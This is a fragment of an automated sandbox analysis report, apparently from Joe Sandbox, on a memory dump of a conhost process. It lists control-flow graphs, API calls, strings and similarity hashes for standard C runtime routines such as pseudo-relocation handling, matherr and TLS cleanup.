419->422 423 140002b68-140002b95 419->423 420->419 425 140002b98-140002baf wcslen 422->425 423->425 424->419 426 140002bb5-140002bc8 425->426 427 140002f7f-140002f9b call 140001370 425->427 429 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 426->429 430 140002bca-140002bde 426->430 427->393 448 140002eed-140002f0b call 140001512 429->448 449 140002f10-140002f38 call 14000145e 429->449 430->429 448->449
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                          • String ID: 0$X$`
                                          • API String ID: 780471329-2527496196
                                          • Opcode ID: 7558b26b139f31e59eaabfba84e39f08ed0f8743d31b8ebc9a86acac828c177a
                                          • Instruction ID: 287eb201aea7c0f5100048d39168a0880787a071f078486999d2dd165213faec
                                          • Opcode Fuzzy Hash: 7558b26b139f31e59eaabfba84e39f08ed0f8743d31b8ebc9a86acac828c177a
                                          • Instruction Fuzzy Hash: 61125CB2608BC091E762CB26F8443DAB7A4F789794F418215EBA957BF5DF78C189C700

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID:
                                          • API String ID: 2643109117-0
                                          • Opcode ID: 5694de4b4e371253d99b403d11f2b43ea022587df89bf32e05a0cc703bc28c66
                                          • Instruction ID: f76f26d4bd2ab3f3ccdc1e5aa3b61a8c9c233b5afcaab8cc494fa658dc5f4b7e
                                          • Opcode Fuzzy Hash: 5694de4b4e371253d99b403d11f2b43ea022587df89bf32e05a0cc703bc28c66
                                          • Instruction Fuzzy Hash: 3E5133B1A01A4085FB17EF27F9943EA27A1BB8CBD0F449525FB4D873B2DE3884958300

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 494 140001ba0-140001bc0 495 140001bc2-140001bd7 494->495 496 140001c09 494->496 497 140001be9-140001bf1 495->497 498 140001c0c-140001c17 call 1400023b0 496->498 499 140001bf3-140001c02 497->499 500 140001be0-140001be7 497->500 505 140001cf4-140001cfe call 140001d40 498->505 506 140001c1d-140001c6c call 1400024d0 VirtualQuery 498->506 499->500 502 140001c04 499->502 500->497 500->498 504 140001cd7-140001cf3 memcpy 502->504 510 140001d03-140001d1e call 140001d40 505->510 506->510 511 140001c72-140001c79 506->511 513 140001d23-140001d38 GetLastError call 140001d40 510->513 514 140001c7b-140001c7e 511->514 515 140001c8e-140001c97 511->515 517 140001cd1 514->517 518 140001c80-140001c83 514->518 519 140001ca4-140001ccf VirtualProtect 515->519 520 140001c99-140001c9c 515->520 517->504 518->517 522 140001c85-140001c8a 518->522 519->513 519->517 520->517 523 140001c9e 520->523 522->517 524 140001c8c 522->524 523->519 524->523
                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007D10,0000000140007D10,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007D10,0000000140007D10,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007D10,0000000140007D10,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: dd333ee8c6dc12eec3822efc8383b621bf3ac9bbf0b21434fe77872da6ad7ea2
                                          • Instruction ID: 51b559be9aaafe00e5a4812fd162a949543b9fde0f6d0c72eb9bda92bbfb5f1f
                                          • Opcode Fuzzy Hash: dd333ee8c6dc12eec3822efc8383b621bf3ac9bbf0b21434fe77872da6ad7ea2
                                          • Instruction Fuzzy Hash: E94134B1601A4486FA66DF57F884BE927A0F78DBC4F558126EF0E877B1DA38C586C700

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 525 140002104-14000210b 526 140002111-140002128 EnterCriticalSection 525->526 527 140002218-140002221 525->527 530 14000220b-140002212 LeaveCriticalSection 526->530 531 14000212e-14000213c 526->531 528 140002272-140002280 527->528 529 140002223-14000222d 527->529 532 140002241-140002263 DeleteCriticalSection 529->532 533 14000222f 529->533 530->527 534 14000214d-140002159 TlsGetValue GetLastError 531->534 532->528 535 140002230-14000223f free 533->535 536 14000215b-14000215e 534->536 537 140002140-140002147 534->537 535->532 535->535 536->537 538 140002160-14000216d 536->538 537->530 537->534 538->537
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                          • String ID:
                                          • API String ID: 3326252324-0
                                          • Opcode ID: bc3daa1688a77dc0f5c5f6d3f166791b891de0709d7bb6591b80e8fcaa0694c6
                                          • Instruction ID: c08974d99f35eb8dc3934c112ac89741d544bf3a65966c824092270b99e5aef9
                                          • Opcode Fuzzy Hash: bc3daa1688a77dc0f5c5f6d3f166791b891de0709d7bb6591b80e8fcaa0694c6
                                          • Instruction Fuzzy Hash: 05210AB0305A0192FA6BDB53F9483E82360B76CBD0F444021FF5A57AB4DB79C99AC300

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 540 140001e10-140001e2d 541 140001e3e-140001e48 540->541 542 140001e2f-140001e38 540->542 544 140001ea3-140001ea8 541->544 545 140001e4a-140001e53 541->545 542->541 543 140001f60-140001f69 542->543 544->543 548 140001eae-140001eb3 544->548 546 140001e55-140001e60 545->546 547 140001ecc-140001ed1 545->547 546->544 549 140001f23-140001f2d 547->549 550 140001ed3-140001ee2 signal 547->550 551 140001eb5-140001eba 548->551 552 140001efb-140001f0a call 140006960 548->552 555 140001f43-140001f45 549->555 556 140001f2f-140001f3f 549->556 550->549 553 140001ee4-140001ee8 550->553 551->543 557 140001ec0 551->557 552->549 561 140001f0c-140001f10 552->561 558 140001eea-140001ef9 signal 553->558 559 140001f4e-140001f53 553->559 555->543 556->555 557->549 558->543 562 140001f5a 559->562 563 140001f12-140001f21 signal 561->563 564 140001f55 561->564 562->543 563->543 564->562
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CCG
                                          • API String ID: 0-1584390748
                                          • Opcode ID: a3dcf7cde38c86fd232df8738afa9f0e0f6cb976cecc8a55a3eacf4416095631
                                          • Instruction ID: 0a3d08a7dc4bcc2d2669149b123edd631e85f9ac70fff7544c3ba8e7311911fe
                                          • Opcode Fuzzy Hash: a3dcf7cde38c86fd232df8738afa9f0e0f6cb976cecc8a55a3eacf4416095631
                                          • Instruction Fuzzy Hash: 272139B2A0160542FA77DA2BF6903F91192ABCC7E4F258535BF19473F5DE3888828241

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 565 140001880-14000189c 566 1400018a2-1400018f9 call 140002420 call 140002660 565->566 567 140001a0f-140001a1f 565->567 566->567 572 1400018ff-140001910 566->572 573 140001912-14000191c 572->573 574 14000193e-140001941 572->574 575 14000194d-140001954 573->575 576 14000191e-140001929 573->576 574->575 577 140001943-140001947 574->577 579 140001956-140001961 575->579 580 14000199e-1400019a6 575->580 576->575 581 14000192b-14000193a 576->581 577->575 578 140001a20-140001a26 577->578 584 140001b87-140001b98 call 140001d40 578->584 585 140001a2c-140001a37 578->585 582 140001970-14000199c call 140001ba0 579->582 580->567 583 1400019a8-1400019c1 580->583 581->574 582->580 588 1400019df-1400019e7 583->588 585->580 589 140001a3d-140001a5f 585->589 592 1400019e9-140001a0d VirtualProtect 588->592 593 1400019d0-1400019dd 588->593 594 140001a7d-140001a97 589->594 592->593 593->567 593->588 595 140001b74-140001b82 call 140001d40 594->595 596 140001a9d-140001afa 594->596 595->584 602 140001b22-140001b26 596->602 603 140001afc-140001b0e 596->603 606 140001b2c-140001b30 602->606 607 140001a70-140001a77 602->607 604 140001b5c-140001b6c 603->604 605 140001b10-140001b20 603->605 604->595 608 140001b6f call 140001d40 604->608 605->602 605->604 606->607 609 140001b36-140001b57 call 140001ba0 606->609 607->580 607->594 608->595 609->604
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: 35ec991b1c12168db313a247811e48783c92f0d1e86d3aa55fc3b18a7711a773
                                          • Instruction ID: 2caf5101b25886cffd00800b2ee1a3370be2bd5e93e1d7107dd9e500e5e7ade1
                                          • Opcode Fuzzy Hash: 35ec991b1c12168db313a247811e48783c92f0d1e86d3aa55fc3b18a7711a773
                                          • Instruction Fuzzy Hash: A75115B6B11544DAEB12CF67F840BD82761A759BE8F548211FB1D077B4DB38C586C700

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 613 140001800-140001810 614 140001812-140001822 613->614 615 140001824 613->615 616 14000182b-140001867 call 140002290 fprintf 614->616 615->616
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 661b6dc18738d443d23f0284281022a23eac4a700933ffe5345cddadad115df7
                                          • Instruction ID: 664e955c08badc08ef9cec9224feb46df3c8613ad4cc7f1f78d0a5a688b1a7e1
                                          • Opcode Fuzzy Hash: 661b6dc18738d443d23f0284281022a23eac4a700933ffe5345cddadad115df7
                                          • Instruction Fuzzy Hash: D5F09672A14A4482E612DF6AB9417ED6361E75D7C1F50D211FF4D676A1DF3CD282C310

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 619 14000219e-1400021a5 620 140002272-140002280 619->620 621 1400021ab-1400021c2 EnterCriticalSection 619->621 622 140002265-14000226c LeaveCriticalSection 621->622 623 1400021c8-1400021d6 621->623 622->620 624 1400021e9-1400021f5 TlsGetValue GetLastError 623->624 625 1400021f7-1400021fa 624->625 626 1400021e0-1400021e7 624->626 625->626 627 1400021fc-140002209 625->627 626->622 626->624 627->626
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.4545426509.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000000B.00000002.4545358438.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545490468.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545657189.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000B.00000002.4545703243.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 6e1952d39ecea9d1036a06d8855d564b5ea3ad6eb30e26c1b64b93bbe724e764
                                          • Instruction ID: f1456eb7145c119eb9572c0d0cf9fb36c6aa53a9c677d15a11b83bfce31ee7c9
                                          • Opcode Fuzzy Hash: 6e1952d39ecea9d1036a06d8855d564b5ea3ad6eb30e26c1b64b93bbe724e764
                                          • Instruction Fuzzy Hash: 9201B6B5305A0192FA57DB53FD083D86360B76CBD1F454021EF0957AB4DB79C999C300